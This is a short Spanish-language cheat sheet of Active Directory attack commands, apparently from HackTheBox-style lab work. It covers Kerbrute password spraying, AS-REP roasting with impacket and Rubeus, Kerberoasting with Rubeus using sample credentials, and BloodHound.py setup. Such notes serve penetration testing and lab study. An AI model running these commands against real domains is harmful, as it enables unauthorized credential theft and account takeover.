Active Directory CheatSheet
Kerbrute
Enumeración de usuarios
Password Spraying
sudo ntpdate 10.10.11.129
./kerbrute passwordspray --dc CONTROLLER.local -d CONTROLLER.local users.txt Password123
AS-REP Roasting
Impacket
for user in $(cat users.txt); do impacket-GetNPUsers -dc-ip <ip_de_dominio> <dominio>/${user} -no-pass | grep -v Impacket; done
Rubeus
.\Rubeus.exe asreproast # ¿como admin? Ver si se necesitan credenciales
# .\Rubeus.exe asreproast /creduser:htb.local\amanda /credpassword:Password123 # TODO Verificar
Kerberoasting
Impacket
Rubeus
.\Rubeus.exe kerberoast # Como Administrator
.\Rubeus.exe kerberoast /creduser:htb.local\amanda /credpassword:Password123
BloodHound
BloodHound.py
Nota: Al recopilar la info con la última versión es recomendable usar a su vez también la última versión del visualizador.
Setup
pyenv ...
git clone https://github.com/fox-it/BloodHound.py.git
cd BloodHound.py
python setup.py install